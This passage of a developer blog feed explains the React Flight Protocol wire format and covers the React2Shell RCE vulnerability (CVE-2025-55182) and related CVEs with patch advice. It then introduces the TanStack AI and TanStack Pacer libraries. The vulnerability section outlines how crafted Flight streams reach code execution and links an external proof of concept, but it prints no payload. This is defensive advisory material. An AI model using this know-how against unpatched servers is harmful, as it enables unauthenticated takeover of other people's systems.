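// Each row looks like "<tag><id>: <payload>", e.g. 'J0: ["$","div",null,{...}]'.
type FlightRow = { tag: string; id: number; data: unknown };

function parseFlightRow(line: string): FlightRow {
  const match = /^([A-Z])(\d+):\s*(.*)$/.exec(line);
  if (!match) throw new Error(`Unrecognized row: ${line}`);
  const [, tag, id, payload] = match;
  return { tag, id: Number(id), data: JSON.parse(payload) };
}

const rows = [
  'J0: ["$","div",null,{"children":"Hello"}]',
  'M1: {"id":"./app/ClientButton.tsx#default"}',
].map(parseFlightRow);
```

<p>Each parsed row carries its tag, its ID, and a JSON payload, which is enough for a client to process the stream incrementally.</p>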
<h3 id="heading-serializing-components-and-elements"><strong>Serializing Components and Elements</strong></h3>
<p>When a Server Component renders, its JSX output is not converted to HTML. Instead, it's serialized into a JSON-like representation. For example, a simple <code>&lt;div&gt;Hello&lt;/div&gt;</code> might be represented as <code>["$","div",null,{"children":"Hello"}]</code>.</p>
<p>The <code>$</code> prefix is a convention for special React elements. <code>$$typeof</code> symbols, which React uses internally to distinguish different types of elements (like <code>REACT_ELEMENT_TYPE</code>, <code>REACT_SERVER_COMPONENT_TYPE</code>), are also serialized efficiently.</p>
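<p>As a rough sketch (not React's actual implementation), producing this tuple form for a plain host element can be pictured as:</p>

```typescript
// Hedged sketch: build the ["$", type, key, props] tuple form described above.
// React's real serializer handles many more cases (components, refs, symbols).
type SerializedElement = [string, string, string | null, Record<string, unknown>];

function serializeHostElement(
  type: string,
  key: string | null,
  props: Record<string, unknown>
): SerializedElement {
  return ["$", type, key, props];
}

const wire = JSON.stringify(serializeHostElement("div", null, { children: "Hello" }));
// wire === '["$","div",null,{"children":"Hello"}]'
```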
<h3 id="heading-client-references-module-references"><strong>Client References (Module References)</strong></h3>
<p>This is where the magic of integrating server and client components happens. When a Server Component renders a Client Component, the client component's code is <em>not</em> sent over the Flight Protocol. Instead, the server sends a <strong>reference</strong> to the client component's module.</p>
<p>The <code>M</code> instruction is used for this. It maps an arbitrary ID to a specific client component module. The client-side React runtime then uses this ID to dynamically import the actual JavaScript module for that component.</p>
<p>The reference format often looks like <code>["$","M",&lt;id&gt;,null,&lt;props&gt;]</code>, where <code>&lt;id&gt;</code> refers to a module previously defined in the stream (e.g., <code>M1: {"id":"./path/to/ClientComponent.js#default"}</code>).</p>
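<p>Conceptually, the client keeps a module map populated by <code>M</code> rows and resolves references through it. The sketch below is hypothetical: real runtimes use bundler-generated module maps and dynamic <code>import()</code>, and the function names here are invented for illustration.</p>

```typescript
// Hypothetical client-side module map (illustrative; bundlers generate the real one).
type ModuleRef = { id: string }; // e.g. "./app/ClientButton.tsx#default"

const moduleMap = new Map<number, ModuleRef>();

// Called when an "M<id>: {...}" row arrives on the stream.
function registerModule(id: number, ref: ModuleRef): void {
  moduleMap.set(id, ref);
}

// Called when the element tree references module <id>.
function resolveClientReference(id: number): { path: string; exportName: string } {
  const ref = moduleMap.get(id);
  if (!ref) throw new Error(`Unknown module reference: ${id}`);
  const [path, exportName] = ref.id.split("#");
  // A real runtime would now dynamically import `path` and pick `exportName`.
  return { path, exportName };
}

registerModule(1, { id: "./app/ClientButton.tsx#default" });
const resolved = resolveClientReference(1);
```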
<h3 id="heading-data-serialization-and-hydration"><strong>Data Serialization and Hydration</strong></h3>
<p>The Flight Protocol efficiently serializes various data types, including primitive values, arrays, and objects. It can also handle more complex types like Promises, allowing Suspense boundaries to work seamlessly across the server-client divide.</p>
<p>The client-side React runtime reads this stream, reconstructs the React element tree, and then renders it. When a client component is referenced, the runtime fetches its JavaScript bundle, instantiates it, and hydrates it with the props received from the server.</p>
<h2 id="heading-5the-wire-format-structure-payload-examples"><strong>5.The Wire Format Structure (Payload Examples)</strong></h2>
<p>Let's illustrate with a simple example. Imagine a Server Component (<code>Page</code>) that renders a Client Component (<code>ClientButton</code>).</p>
<pre><code class="lang-typescript"><span class="hljs-comment">// app/page.tsx (Server Component)</span>
<span class="hljs-keyword">import</span> ClientButton <span class="hljs-keyword">from</span> <span class="hljs-string">'./ClientButton'</span>; <span class="hljs-comment">// This is a Client Component</span>

<span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">Page</span>(<span class="hljs-params"></span>) </span>{
  <span class="hljs-keyword">const</span> message = <span class="hljs-string">"Hello from Server!"</span>;
  <span class="hljs-keyword">return</span> (
    &lt;div&gt;
      &lt;h1&gt;{message}&lt;/h1&gt;
      &lt;ClientButton text=<span class="hljs-string">"Click me!"</span> /&gt;
    &lt;/div&gt;
  );
}

<span class="hljs-comment">// app/ClientButton.tsx (Client Component)</span>
<span class="hljs-string">'use client'</span>; <span class="hljs-comment">// This directive marks it as a Client Component</span>
<span class="hljs-keyword">import</span> { useState } <span class="hljs-keyword">from</span> <span class="hljs-string">'react'</span>;

<span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">ClientButton</span>(<span class="hljs-params">{ text }: { text: <span class="hljs-built_in">string</span> }</span>) </span>{
  <span class="hljs-keyword">const</span> [count, setCount] = useState(<span class="hljs-number">0</span>);
  <span class="hljs-keyword">return</span> (
    &lt;button onClick={<span class="hljs-function">() =&gt;</span> setCount(count + <span class="hljs-number">1</span>)}&gt;
      {text} Count: {count}
    &lt;/button&gt;
  );
}
</code></pre>
<p>When the <code>Page</code> Server Component is requested, the server might send a Flight Protocol payload similar to this <strong>(simplified and illustrative)</strong>:</p>
<pre><code class="lang-typescript">J0: [<span class="hljs-string">"$"</span>,<span class="hljs-string">"div"</span>,<span class="hljs-literal">null</span>,{<span class="hljs-string">"children"</span>:[[<span class="hljs-string">"$"</span>,<span class="hljs-string">"h1"</span>,<span class="hljs-literal">null</span>,{<span class="hljs-string">"children"</span>:<span class="hljs-string">"Hello from Server!"</span>}],[<span class="hljs-string">"$"</span>,<span class="hljs-string">"M"</span>,<span class="hljs-number">1</span>,<span class="hljs-literal">null</span>,{<span class="hljs-string">"text"</span>:<span class="hljs-string">"Click me!"</span>}]]}]
M1: {<span class="hljs-string">"id"</span>:<span class="hljs-string">"./app/ClientButton.tsx#default"</span>}
</code></pre>
<p>Let's break this down:</p>
<ol>
<li><p><code>J0: ...</code>: This is a JSON instruction (<code>J</code>) with ID <code>0</code>. It describes the root React element structure.</p>
<ul>
<li><p><code>["$","div",null,...]</code>: Represents a <code>div</code> element.</p>
</li>
<li><p><code>"children": [...]</code>: An array of children.</p>
</li>
<li><p><code>["$","h1",null,{"children":"Hello from Server!"}]</code>: The <code>h1</code> element with its text.</p>
</li>
<li><p><code>["$","M",1,null,{"text":"Click me!"}]</code>: This is the crucial part. It's an instruction to render a <strong>module reference</strong> (<code>M</code>) with ID <code>1</code>. The <code>null</code> is for the key, and <code>{"text":"Click me!"}</code> are the props passed to the <code>ClientButton</code>.</p>
</li>
</ul>
</li>
<li><p><code>M1: {"id":"./app/ClientButton.tsx#default"}</code>: This is a Module instruction (<code>M</code>) with ID <code>1</code>. It tells the client that whenever it encounters a reference to module <code>1</code>, it should import the <code>default</code> export from <code>./app/ClientButton.tsx</code>.</p>
</li>
</ol>
<p>The client-side React runtime receives this stream. It sees the <code>div</code> and <code>h1</code> elements and renders them. When it encounters <code>["$","M",1,...]</code>, it looks up module <code>1</code>, dynamically imports <code>./app/ClientButton.tsx</code>, and then renders <code>ClientButton</code> with the provided <code>text</code> prop. The <code>ClientButton</code>'s interactivity (the <code>useState</code> hook) is handled purely on the client.</p>
<h2 id="heading-6the-react2shell-security-vulnerability"><strong>6.The React2Shell Security Vulnerability</strong></h2>
<p>While the Flight Protocol was designed to be a secure serialization format, December 2025 revealed a critical flaw in its implementation, now widely known as <strong>React2Shell</strong>. This vulnerability (CVE-2025-55182) carries a maximum severity score of <strong>CVSS 10.0</strong>, highlighting that even robust protocols can suffer from implementation defects.</p>
<h3 id="heading-what-is-react2shell">What is React2Shell?</h3>
<p>React2Shell is an <strong>Insecure Deserialization</strong> vulnerability in the React Server Components (RSC) "Flight" protocol implementation itself (specifically in the <code>react-server-dom-*</code> packages). Contrary to early assumptions, the flaw is not limited to untrusted user data; it lies in how the React server runtime deserializes the stream of component instructions.</p>
<h3 id="heading-how-it-works"><strong>How it Works</strong></h3>
<p>The Flight Protocol uses special prefixes (like <code>$</code>, <code>@</code>, and <code>$F</code>) to denote different data types (references, promises, symbols). The vulnerability exploits the <code>reviveModel</code> function—the internal mechanism React uses to reconstruct the component tree on the server.</p>
<ol>
<li><p><strong>The Attack:</strong> An attacker sends a maliciously crafted HTTP request containing a Flight stream with specific polluted prototypes or referencing internal gadgets (using the <code>$@</code> chunk type).</p>
</li>
<li><p><strong>The Execution:</strong> Because the parser failed to properly validate these keys against the object's own properties, the server blindly deserializes the payload.</p>
</li>
<li><p><strong>The Result:</strong> This triggers Remote Code Execution (RCE), allowing the attacker to run arbitrary shell commands on the server without any authentication.</p>
</li>
</ol>
<h3 id="heading-the-december-11-2025-update"><strong>The December 11, 2025 Update</strong></h3>
<p>Following the initial disclosure, further scrutiny by the security community revealed two additional vulnerabilities in the same subsystem, addressed in the December 11th security patch:</p>
<ul>
<li><p><strong>CVE-2025-55184 (DoS):</strong> A high-severity flaw where crafted requests can trap the server in an infinite loop, causing a Denial of Service.</p>
</li>
<li><p><strong>CVE-2025-55183 (Source Disclosure):</strong> A medium-severity issue that could trick the server into returning the compiled source code of Server Actions, potentially leaking business logic.</p>
</li>
</ul>
<h3 id="heading-mitigation-and-best-practices"><strong>Mitigation and Best Practices</strong></h3>
<p>The only effective mitigation for React2Shell is to <strong>patch immediately</strong>.</p>
<ul>
<li><p><strong>Upgrade Essential Packages:</strong> Ensure <code>next</code> is upgraded to <strong>15.1.11+</strong> or <strong>14.2.35+</strong> (for older versions). If you are using raw React 19, ensure <code>react-server-dom-webpack</code> is version <strong>19.0.1+</strong>.</p>
</li>
<li><p><strong>Audit Dependencies:</strong> Check for any third-party libraries or internal tools that might be bundling older versions of the RSC renderer.</p>
</li>
<li><p><strong>Least Privilege:</strong> Ensure your Node.js server process runs with the absolute minimum permissions required, limiting the blast radius should an RCE occur.</p>
</li>
</ul>
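<p>A quick way to sanity-check your lockfile is to compare installed versions against the patched minimums quoted above. The helper below is a simplified sketch (it ignores pre-release tags and assumes plain <code>x.y.z</code> version strings):</p>

```typescript
// Simplified semver comparison (sketch only; ignores pre-release/build metadata).
function isAtLeast(installed: string, minimum: string): boolean {
  const a = installed.split(".").map(Number);
  const b = minimum.split(".").map(Number);
  for (let i = 0; i < 3; i++) {
    if ((a[i] ?? 0) > (b[i] ?? 0)) return true;
    if ((a[i] ?? 0) < (b[i] ?? 0)) return false;
  }
  return true; // versions are equal
}

// Minimums as quoted in the advisory discussion above.
const nextOk = isAtLeast("15.1.11", "15.1.11"); // patched
const nextVulnerable = !isAtLeast("15.1.10", "15.1.11"); // needs upgrade
```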
<h2 id="heading-conclusion">Conclusion</h2>
<p>The React Flight Protocol is a sophisticated yet elegant solution to the challenge of building modern, high-performance web applications with React. By defining a streamable, interleaved wire format, it enables Server Components to deliver significant performance benefits and a streamlined developer experience.</p>
<h3 id="heading-read-more-about-the-react2shell-vulnerability">Read More about the React2Shell vulnerability</h3>
<ol>
<li><p><a target="_blank" href="https://nextjs.org/blog/security-update-2025-12-11">https://nextjs.org/blog/security-update-2025-12-11</a></p>
</li>
<li><p><a target="_blank" href="https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/">https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/</a></p>
</li>
<li><p><a target="_blank" href="https://blog.cloudflare.com/react2shell-rsc-vulnerabilities-exploitation-threat-brief/">https://blog.cloudflare.com/react2shell-rsc-vulnerabilities-exploitation-threat-brief/</a></p>
</li>
</ol>
<p>PoC by Lachlan for React2Shell Vulnerability: <a target="_blank" href="https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc">https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc</a></p>
]]></content:encoded></item><item><title><![CDATA[TanStack AI]]></title><description><![CDATA[The TanStack team just dropped the alpha release of TanStack AI — a framework-agnostic AI toolkit built for developers who want real control over their stack.
Today’s AI ecosystem pushes you into someone else’s platform, tools, and workflow. TanStack...]]></description><link>https://blog.nidhin.dev/tanstack-ai</link><guid isPermaLink="true">https://blog.nidhin.dev/tanstack-ai</guid><category><![CDATA[tanstack ai]]></category><category><![CDATA[AI]]></category><category><![CDATA[tanstack]]></category><category><![CDATA[JavaScript]]></category><category><![CDATA[Next.js]]></category><category><![CDATA[Remix]]></category><category><![CDATA[React]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sun, 07 Dec 2025 18:24:41 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1765131744945/21888cb3-ce9f-4609-ac97-2a11189f65c2.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>The TanStack team just dropped the alpha release of TanStack AI — a framework-agnostic AI toolkit built for developers who want real control over their stack.</p>
<p>Today’s AI ecosystem pushes you into someone else’s platform, tools, and workflow. TanStack AI flips that. It’s open source, adapter-driven, and works with your existing stack instead of boxing you into a new one.</p>
<h2 id="heading-1whats-inside-tanstack-ai">1.What’s Inside TanStack AI</h2>
<ol>
<li><p><strong>Multi-Language Server Support</strong> : Out of the gate: <strong>JavaScript/TypeScript</strong>, <strong>PHP</strong>, and <strong>Python</strong> — each supporting full agentic flows and tool calling.</p>
</li>
<li><p><strong>Adapters for Real-World Providers</strong> : TypeScript adapters for</p>
</li>
</ol>
<ul>
<li><p>OpenAI</p>
</li>
<li><p>Anthropic</p>
</li>
<li><p>Gemini</p>
</li>
<li><p>Ollama</p>
</li>
</ul>
<ol start="3">
<li><p><strong>Summarization &amp; Embeddings</strong> : Built-in summarization and embedding support alongside chat.</p>
</li>
<li><p><strong>Open Protocol</strong> : The server-client protocol is fully documented. Use any language. Use any transport. If your backend speaks the protocol, the client works.</p>
</li>
</ol>
<h2 id="heading-2why-tanstack-ai-exists">2.Why TanStack AI Exists</h2>
<p>Developers deserve AI tools without:</p>
<ul>
<li><p>vendor lock-in</p>
</li>
<li><p>proprietary platforms</p>
</li>
<li><p>ecosystem traps</p>
</li>
</ul>
<p>Just <strong>open source</strong>, <strong>framework-agnostic</strong>, <strong>type-safe</strong>, <strong>developer-first</strong> tooling — from the same team that brought you TanStack Query, Table, Router, and more.</p>
<h2 id="heading-3framework-agnostic">3.Framework Agnostic</h2>
<p>TanStack AI supports the following frameworks:</p>
<ul>
<li><p><strong>Next.js</strong> - API routes and App Router</p>
</li>
<li><p><strong>TanStack Start</strong> - React Start or Solid Start (recommended!)</p>
</li>
<li><p><strong>Express</strong> - Node.js server</p>
</li>
<li><p><strong>React Router v7 (Remix)</strong> - Loaders and actions</p>
</li>
</ul>
<p>TanStack AI lets you define a tool once and provide environment-specific implementations: declare the tool's input/output types with <code>toolDefinition()</code>, then attach the server behavior with <code>.server()</code> (or a client implementation with <code>.client()</code>). These isomorphic tools can be invoked by the AI runtime regardless of framework.</p>
<pre><code class="lang-typescript"><span class="hljs-keyword">import</span> { toolDefinition } <span class="hljs-keyword">from</span> <span class="hljs-string">'@tanstack/ai'</span>
<span class="hljs-keyword">import</span> { z } <span class="hljs-keyword">from</span> <span class="hljs-string">'zod'</span>

<span class="hljs-comment">// Define a tool</span>
<span class="hljs-keyword">const</span> getProductsDef = toolDefinition({
  name: <span class="hljs-string">'getProducts'</span>,
  inputSchema: z.object({ query: z.string() }),
  outputSchema: z.array(z.object({ id: z.string(), name: z.string() })),
})

<span class="hljs-comment">// Create server implementation</span>
<span class="hljs-keyword">const</span> getProducts = getProductsDef.server(<span class="hljs-keyword">async</span> ({ query }) =&gt; {
  <span class="hljs-keyword">return</span> <span class="hljs-keyword">await</span> db.products.search(query)
})

<span class="hljs-comment">// Use in AI chat</span>
chat({ tools: [getProducts] })
</code></pre>
<h2 id="heading-4installation-amp-quick-start">4.Installation &amp; Quick Start</h2>
<p>You can install TanStack AI in minutes:</p>
<pre><code class="lang-bash">npm install @tanstack/ai @tanstack/ai-react @tanstack/ai-openai
</code></pre>
<h3 id="heading-server-setup">Server Setup</h3>
<p>First, create an API route that handles chat requests. Here's a simplified example:</p>
<pre><code class="lang-typescript"><span class="hljs-comment">// app/api/chat/route.ts (Next.js)</span>
<span class="hljs-comment">// or src/routes/api/chat.ts (TanStack Start)</span>
<span class="hljs-keyword">import</span> { chat, toStreamResponse } <span class="hljs-keyword">from</span> <span class="hljs-string">"@tanstack/ai"</span>;
<span class="hljs-keyword">import</span> { openai } <span class="hljs-keyword">from</span> <span class="hljs-string">"@tanstack/ai-openai"</span>;

<span class="hljs-keyword">export</span> <span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">POST</span>(<span class="hljs-params">request: Request</span>) </span>{
  <span class="hljs-comment">// Check for API key</span>
  <span class="hljs-keyword">if</span> (!process.env.OPENAI_API_KEY) {
    <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> Response(
      <span class="hljs-built_in">JSON</span>.stringify({
        error: <span class="hljs-string">"OPENAI_API_KEY not configured"</span>,
      }),
      {
        status: <span class="hljs-number">500</span>,
        headers: { <span class="hljs-string">"Content-Type"</span>: <span class="hljs-string">"application/json"</span> },
      }
    );
  }

  <span class="hljs-keyword">const</span> { messages, conversationId } = <span class="hljs-keyword">await</span> request.json();

  <span class="hljs-keyword">try</span> {
    <span class="hljs-comment">// Create a streaming chat response</span>
    <span class="hljs-keyword">const</span> stream = chat({
      adapter: openai(),
      messages,
      model: <span class="hljs-string">"gpt-4o"</span>,
      conversationId
    });

    <span class="hljs-comment">// Convert stream to HTTP response</span>
    <span class="hljs-keyword">return</span> toStreamResponse(stream);
  } <span class="hljs-keyword">catch</span> (error: <span class="hljs-built_in">any</span>) {
    <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> Response(
      <span class="hljs-built_in">JSON</span>.stringify({
        error: error.message || <span class="hljs-string">"An error occurred"</span>,
      }),
      {
        status: <span class="hljs-number">500</span>,
        headers: { <span class="hljs-string">"Content-Type"</span>: <span class="hljs-string">"application/json"</span> },
      }
    );
  }
}
</code></pre>
<h3 id="heading-client-setup">Client Setup</h3>
<p>To use the chat API from your React frontend, create a Chat component:</p>
<pre><code class="lang-typescript"><span class="hljs-comment">// components/Chat.tsx</span>
<span class="hljs-keyword">import</span> { useState } <span class="hljs-keyword">from</span> <span class="hljs-string">"react"</span>;
<span class="hljs-keyword">import</span> { useChat, fetchServerSentEvents } <span class="hljs-keyword">from</span> <span class="hljs-string">"@tanstack/ai-react"</span>;

<span class="hljs-keyword">export</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">Chat</span>(<span class="hljs-params"></span>) </span>{
  <span class="hljs-keyword">const</span> [input, setInput] = useState(<span class="hljs-string">""</span>);

  <span class="hljs-keyword">const</span> { messages, sendMessage, isLoading } = useChat({
    connection: fetchServerSentEvents(<span class="hljs-string">"/api/chat"</span>),
  });

  <span class="hljs-keyword">const</span> handleSubmit = <span class="hljs-function">(<span class="hljs-params">e: React.FormEvent</span>) =&gt;</span> {
    e.preventDefault();
    <span class="hljs-keyword">if</span> (input.trim() &amp;&amp; !isLoading) {
      sendMessage(input);
      setInput(<span class="hljs-string">""</span>);
    }
  };

  <span class="hljs-keyword">return</span> (
    &lt;div className=<span class="hljs-string">"flex flex-col h-screen"</span>&gt;
      {<span class="hljs-comment">/* Messages */</span>}
      &lt;div className=<span class="hljs-string">"flex-1 overflow-y-auto p-4"</span>&gt;
        {messages.map(<span class="hljs-function">(<span class="hljs-params">message</span>) =&gt;</span> (
          &lt;div
            key={message.id}
            className={<span class="hljs-string">`mb-4 <span class="hljs-subst">${
              message.role === <span class="hljs-string">"assistant"</span> ? <span class="hljs-string">"text-blue-600"</span> : <span class="hljs-string">"text-gray-800"</span>
            }</span>`</span>}
          &gt;
            &lt;div className=<span class="hljs-string">"font-semibold mb-1"</span>&gt;
              {message.role === <span class="hljs-string">"assistant"</span> ? <span class="hljs-string">"Assistant"</span> : <span class="hljs-string">"You"</span>}
            &lt;/div&gt;
            &lt;div&gt;
              {message.parts.map(<span class="hljs-function">(<span class="hljs-params">part, idx</span>) =&gt;</span> {
                <span class="hljs-keyword">if</span> (part.type === <span class="hljs-string">"thinking"</span>) {
                  <span class="hljs-keyword">return</span> (
                    &lt;div
                      key={idx}
                      className=<span class="hljs-string">"text-sm text-gray-500 italic mb-2"</span>
                    &gt;
                      💭 Thinking: {part.content}
                    &lt;/div&gt;
                  );
                }
                <span class="hljs-keyword">if</span> (part.type === <span class="hljs-string">"text"</span>) {
                  <span class="hljs-keyword">return</span> &lt;div key={idx}&gt;{part.content}&lt;/div&gt;;
                }
                <span class="hljs-keyword">return</span> <span class="hljs-literal">null</span>;
              })}
            &lt;/div&gt;
          &lt;/div&gt;
        ))}
      &lt;/div&gt;

      {<span class="hljs-comment">/* Input */</span>}
      &lt;form onSubmit={handleSubmit} className=<span class="hljs-string">"p-4 border-t"</span>&gt;
        &lt;div className=<span class="hljs-string">"flex gap-2"</span>&gt;
          &lt;input
            <span class="hljs-keyword">type</span>=<span class="hljs-string">"text"</span>
            value={input}
            onChange={<span class="hljs-function">(<span class="hljs-params">e</span>) =&gt;</span> setInput(e.target.value)}
            placeholder=<span class="hljs-string">"Type a message..."</span>
            className=<span class="hljs-string">"flex-1 px-4 py-2 border rounded-lg"</span>
            disabled={isLoading}
          /&gt;
          &lt;button
            <span class="hljs-keyword">type</span>=<span class="hljs-string">"submit"</span>
            disabled={!input.trim() || isLoading}
            className=<span class="hljs-string">"px-6 py-2 bg-blue-600 text-white rounded-lg disabled:opacity-50"</span>
          &gt;
            Send
          &lt;/button&gt;
        &lt;/div&gt;
      &lt;/form&gt;
    &lt;/div&gt;
  );
}
</code></pre>
<p>Ensure you set <code>OPENAI_API_KEY</code> in your <code>.env</code> file.</p>
<p>You now have a working chat application. The <code>useChat</code> hook handles:</p>
<ul>
<li><p>Message state management</p>
</li>
<li><p>Streaming responses</p>
</li>
<li><p>Loading states</p>
</li>
<li><p>Error handling</p>
</li>
</ul>
<h2 id="heading-5devtools">5.DevTools</h2>
<p>TanStack Devtools is a unified devtools panel for inspecting and debugging TanStack libraries, including TanStack AI. It provides real-time insights into AI interactions, tool calls, and state changes.</p>
<ul>
<li><p><strong>Real-time Monitoring</strong> - View live chat messages, tool invocations, and AI responses.</p>
</li>
<li><p><strong>Tool Call Inspection</strong> - Inspect input and output of tool calls.</p>
</li>
<li><p><strong>State Visualization</strong> - Visualize chat state and message history.</p>
</li>
<li><p><strong>Error Tracking</strong> - Monitor errors and exceptions in AI interactions.</p>
</li>
</ul>
<h3 id="heading-installation">Installation</h3>
<pre><code class="lang-bash">npm install -D @tanstack/react-ai-devtools @tanstack/react-devtools
</code></pre>
<h3 id="heading-usage">Usage</h3>
<p>Import and include the Devtools component in your application</p>
<pre><code class="lang-typescript"><span class="hljs-keyword">import</span> { TanStackDevtools } <span class="hljs-keyword">from</span> <span class="hljs-string">'@tanstack/react-devtools'</span>
<span class="hljs-keyword">import</span> { aiDevtoolsPlugin } <span class="hljs-keyword">from</span> <span class="hljs-string">'@tanstack/react-ai-devtools'</span>

<span class="hljs-keyword">const</span> App = <span class="hljs-function">() =&gt;</span> {
  <span class="hljs-keyword">return</span> (
    &lt;&gt;
       &lt;TanStackDevtools 
          plugins={[
            <span class="hljs-comment">// ... other plugins</span>
            aiDevtoolsPlugin(),
          ]}
          <span class="hljs-comment">// this config is important to connect to the server event bus</span>
          eventBusConfig={{
            connectToServerBus: <span class="hljs-literal">true</span>,
          }}
        /&gt;
    &lt;/&gt;
  )
}
</code></pre>
<p>That’s a quick overview of TanStack AI. Check the official docs for more info <a target="_blank" href="https://tanstack.com/ai/latest">https://tanstack.com/ai/latest</a></p>
]]></content:encoded></item><item><title><![CDATA[TanStack Pacer]]></title><description><![CDATA[TanStack Pacer is a library from the TanStack team where they share the high quality utilities for controlling function execution timings in the applications.
TanStack Pacer is currently a client-side only library but it is designed to be used in ser...]]></description><link>https://blog.nidhin.dev/tanstack-pacer</link><guid isPermaLink="true">https://blog.nidhin.dev/tanstack-pacer</guid><category><![CDATA[tanstack-pacer]]></category><category><![CDATA[tanstack]]></category><category><![CDATA[pacer]]></category><category><![CDATA[JavaScript]]></category><category><![CDATA[React]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sat, 29 Nov 2025 17:46:28 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1764438195091/1d19f20c-1058-44e7-887d-ebd785251edd.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>TanStack Pacer is a library from the TanStack team that provides high-quality utilities for controlling function execution timing in your applications.</p>
<p>TanStack Pacer is currently a client-side-only library, but it is designed to work on the server side as well.</p>
<h2 id="heading-features-of-tanstack-pacer">Features of TanStack Pacer</h2>
<ol>
<li><p><strong>Debouncing</strong> - Delay execution until after a period of inactivity for when you only care about the last execution in a sequence.</p>
</li>
<li><p><strong>Throttling</strong> - Smoothly limit the rate at which a function can fire</p>
</li>
<li><p><strong>Rate Limiting</strong> - Limit the rate at which a function can fire over a period of time</p>
</li>
<li><p><strong>Queuing</strong> - Queue functions to be executed in a specific order; choose from FIFO, LIFO, and priority queue implementations</p>
</li>
<li><p><strong>Batching</strong> - Chunk up multiple operations into larger batches to reduce total back-and-forth operations</p>
</li>
<li><p><strong>Async or Sync Variations</strong> - Choose between synchronous and asynchronous versions of each utility</p>
</li>
<li><p><strong>State Management</strong> - Uses TanStack Store under the hood for state management with fine-grained reactivity</p>
</li>
<li><p><strong>Convenient Hooks</strong> - Reduce boilerplate code with pre-built hooks such as <code>useDebouncedCallback</code>, <code>useThrottledValue</code>, and <code>useQueuedState</code></p>
</li>
<li><p><strong>Tree-shaking</strong> - Get tree-shaking right for your applications by default</p>
</li>
<li><p><strong>Type safety</strong> - Full type safety with TypeScript, ensuring your functions are always called with the correct arguments</p>
</li>
</ol>
<h2 id="heading-installation">Installation</h2>
<p>To install TanStack Pacer for React, run the command below:</p>
<pre><code class="lang-bash">npm install @tanstack/react-pacer
</code></pre>
<p>To use the devtools for debugging and monitoring, install both the framework devtools and the Pacer devtools packages</p>
<pre><code class="lang-bash">npm install @tanstack/react-devtools @tanstack/react-pacer-devtools
</code></pre>
<h2 id="heading-debouncing">Debouncing</h2>
<p>Debouncing is a technique that delays the execution of a function until a specified period of inactivity has passed.</p>
<pre><code class="lang-typescript">"use client"
import { useState, useEffect } from "react"
import { useDebouncedValue } from "@tanstack/react-pacer"

export default function ProductSearch() {
  const [input, setInput] = useState("")
  const [results, setResults] = useState&lt;string[]&gt;([])

  // Debounce input by 400ms
  const [debouncedInput] = useDebouncedValue(input, { wait: 400 })

  useEffect(() =&gt; {
    if (!debouncedInput) {
      setResults([])
      return
    }

    const fetchData = async () =&gt; {
      const response = await fetch(`/api/products?query=${debouncedInput}`)
      const json = await response.json()
      setResults(json.items)
    }

    fetchData()
  }, [debouncedInput])

  return (
    &lt;div className="space-y-2"&gt;
      &lt;input
        className="border p-2 w-full"
        placeholder="Search products..."
        value={input}
        onChange={(e) =&gt; setInput(e.target.value)}
      /&gt;

      {/* Render suggestions */}
      {results.length &gt; 0 &amp;&amp; (
        &lt;ul className="border rounded p-2 bg-white"&gt;
          {results.map(item =&gt; (
            &lt;li key={item} className="py-1 border-b last:border-none"&gt;
              {item}
            &lt;/li&gt;
          ))}
        &lt;/ul&gt;
      )}
    &lt;/div&gt;
  )
}
</code></pre>
<p>The example above waits for 400ms of typing inactivity before calling the search API, so a request is not fired on every keystroke.</p>
<h2 id="heading-throttling">Throttling</h2>
<p>Throttling ensures function executions are evenly spaced over time. Unlike rate limiting which allows bursts of executions up to a limit, or debouncing which waits for activity to stop, throttling creates a smoother execution pattern by enforcing consistent delays between calls.</p>
<pre><code class="lang-typescript"><span class="hljs-string">"use client"</span>
import { throttle } from <span class="hljs-string">"@tanstack/react-pacer"</span>

<span class="hljs-built_in">export</span> default <span class="hljs-keyword">function</span> <span class="hljs-function"><span class="hljs-title">SafeButton</span></span>() {
  const handleClick = throttle(() =&gt; {
    alert(<span class="hljs-string">"Action performed"</span>)
  }, { <span class="hljs-built_in">wait</span>: 1000 }) // only allowed once per second

  <span class="hljs-built_in">return</span> (
    &lt;button
      onClick={handleClick}
      className=<span class="hljs-string">"px-4 py-2 bg-blue-600 text-white rounded"</span>
    &gt;
      Click Me Fast — I’m Throttled
    &lt;/button&gt;
  )
}
</code></pre>
<p>A throttled button like this prevents spam clicks, which is useful for API calls, form submissions, or payment prompts.</p>
<h2 id="heading-rate-limiting">Rate Limiting</h2>
<p>Rate Limiting is a technique that limits the rate at which a function can execute over a specific time window. It is particularly useful for scenarios where you want to prevent a function from being called too frequently, such as when handling API requests or other external service calls.</p>
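<p>Conceptually, a rate limiter keeps a sliding window of recent call timestamps and rejects calls once the window is full. A minimal sketch of that idea (not Pacer's implementation; the injectable now function is just for testability):</p>

```typescript
// Simplified sliding-window rate limiter (illustration only): allow at
// most `limit` calls per `interval` ms; excess calls return false.
function createRateLimiter(
  limit: number,
  interval: number,
  now: () => number = Date.now
): () => boolean {
  const timestamps: number[] = []
  return () => {
    const t = now()
    // drop timestamps that have aged out of the window
    while (timestamps.length > 0 && t - timestamps[0] >= interval) {
      timestamps.shift()
    }
    if (timestamps.length >= limit) return false // over the limit: reject
    timestamps.push(t)
    return true
  }
}
```

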